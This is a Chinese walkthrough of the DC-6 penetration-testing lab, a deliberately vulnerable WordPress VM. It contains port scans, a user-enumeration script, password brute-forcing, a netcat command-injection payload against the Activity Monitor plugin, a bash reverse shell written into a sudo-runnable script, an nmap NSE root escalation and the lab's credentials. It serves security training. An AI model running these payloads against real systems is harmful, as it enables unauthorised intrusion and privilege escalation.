DC-6靶机渗透
1.渗透过程
写在前面:
靶机介绍内容提取:
-
NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:
192.168.0.142 wordyNOTE: I’ve used 192.168.0.142 as an example. You’ll need to use your normal method to determine the IP address of the VM, and adapt accordingly.
注意:您需要在pentesting设备上编辑主机文件,使其读取如下内容:
192.168.0.142 wordy
注:我以192.168.0.142为例。您需要使用常规方法来确定VM的IP地址,并相应地进行调整。
Clue
OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
That should save you a few years. ;-)线索
好吧,这并不是一个真正的线索,但更多的是一些“我们不想花五年时间等待某个过程完成”之类的建议,给那些只想继续工作的人。
cat/usr/share/wordlists/rockyou.txt | grep k01>passwords.txt
这样可以省你几年的时间。;-)
我们需要配置hosts文件
先把IP地址找出来:
netdiscover -r 192.168.0.1/24
找到IP地址为:
192.168.0.141
配hosts文件:
echo '192.168.0.141 wordy' >> /ectc/hosts
设置好了ping 一下试试…
namp 扫一下端口 :
namp -sS -A -p- 192.168.0.141
扫描结果:
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-26 19:51 CST
Nmap scan report for wordy (192.168.0.141)
Host is up (0.00028s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
MAC Address: 00:0C:29:B9:86:10 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.28 ms wordy (192.168.0.141)
开了web和ssh
先看看web
用
Wappalyzer
看到网站时WordPress
的框架好说,之前做过的~知道默认的后台地址:http://wordy/wp-login.php
这里分享一个专门枚举
WordPress
用户名的python
脚本:
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys,re
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36',
}
def getAuthor(_u):
url = _u
for i in range(1,50):
geturl = url + "?author={}".format(i)
try:
global res
res = requests.get(geturl,headers=headers,verify=False,timeout=10).content
except Exception as e:
print str(e)
p = re.compile(r'<body class="archive author author-(.+?) author-')
matchs = []
try:
matchs = p.findall(res.decode())
except UnicodeDecodeError:
matchs = p.findall(res)
fp = open('auth.txt','a')
for auth in matchs:
print('\033[33m author: ' + auth + '\033[0m')
fp.write(auth + '\n')
fp.close()
print('\033[32m [+] The results are saved in auth.txt. \033[0m')
if __name__ == '__main__':
_argv = sys.argv
if len(_argv) < 2:
print('\033[31m [-] Please enter the URL to enumerate. \033[0m');
print('\033[35m template: ./author.py http://www.wordpress.com. \033[0m')
sys.exit(-1)
getAuthor(_argv[1])
我们可以得到一个auth.txt的文件
用来做用户名的字典
还有上面线索说的:
cat/usr/share/wordlists/rockyou.txt | grep k01>passwords.txt
执行这个可以得到一个密码字典
用
burpsuite
去给他爆破然后就得到了一个账号和密码:
user:mark
passwd:helpdesk01
进后台之后
发现没啥权限
只能操作一个插件:
Activity
找想办法拿shell
先看看有没有框架漏洞 :
searchsploit wordpress Activity
找到一些跨站脚本攻击和一个命令注入
这里我就用命令注入:
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection |
exploits/php/webapps/45274.html
看了些
45274.html
这个文件说是在http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools页面下
IP输入框存在命令注入 但是IP输入框的最大长度只有15,这时候可以抓包去改了
在参数填入
0.0.0.0 | nc -lvp 6666 -e /bin/bash
然后kali用nc去连接就可以得到shell了
nc 192.168.0.141 6666 #nc连接
# 获得交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
我们先看看有哪些用户
cat /etc/passwd
发现4个自建用户
graham:x:1001:1001:Graham,,,:/home/graham:/bin/bash
mark:x:1002:1002:Mark,,,:/home/mark:/bin/bash
sarah:x:1003:1003:Sarah,,,:/home/sarah:/bin/bash
jens:x:1004:1004:Jens,,,:/home/jens:/bin/bash去各自的用户目录下看看
www-data@dc-6:/var/www/html/wp-admin$ ls -l /home/jens;ls -l /home/sarah;ls -l /home/mark;ls -l /home/graham
< -l /home/sarah;ls -l /home/mark;ls -l /home/graham
total 4
-rwxrwxr-x 1 jens devs 56 Apr 26 00:01 backups.sh
total 0
total 4
drwxr-xr-x 2 mark mark 4096 Apr 26 2019 stuff
total 0
# 看到jens下面有个backups.sh文件
# mark有个stuff文件夹
cd /home/mark/stuff;ls
things-to-do.txt
#看到有个 things-to-do.txt 文件
cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
要做的事情:
-恢复超光驱的全部功能(需要与Jens通话)
-为莎拉的告别会买礼物
-添加新用户:graham-GSo7isUM1D4——完成
-申请OSCP课程
-为莎拉的替代品购买新的笔记本电脑
找到graham的密码,并且开了22端口,我们用ssh登录试试
graham用户目录我们已经看了,啥也没有
看看计划任务:
crontab -l
>>>>>>啥也没有看看
history
>>>>>啥也没有看看
sudo -l
找到一条
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
可以不要密码执行
/home/jens/backups.sh
发现里面是打包网站的,我们让他去反弹一个shell
echo 'bash -i >& /dev/tcp/192.168.0.21/4444 0>&1' > /home/jens/backups.sh
- 再去执行它
sudo -u jens /home/jens/backups.sh
看看计划任务:
crontab -l
>>>>>>啥也没有看看
history
>>>>>啥也没有看看
sudo -l
User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
可以用以root的身份无密码执行nmap
nmap可以执行nse文件
echo 'os.execute("/bin/bash")' > /tmp/nmap.nse
sudo nmap --script /tmp/nmap.nse
- 接着就得到了一个
rootshell
root@dc-6:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
#直接获得flag
cat ~/$(cd ~;ls)
其实在网站配置文件里面还有数据库的账号密码…里面的密码太难了不会搞
找到了生成密码的文件,发现的每次都不一样,不知道怎么破解
2. 重要信息:
#1. 网站后台账号密码:
user: mark
passwd: helpdesk01
#2. ssh账号密码:
user: graham
passwd: GSo7isUM1D4
#3.数据库和账号密码:
user: wpdbuser
passwd: meErKatZ
DBName: wordpressdb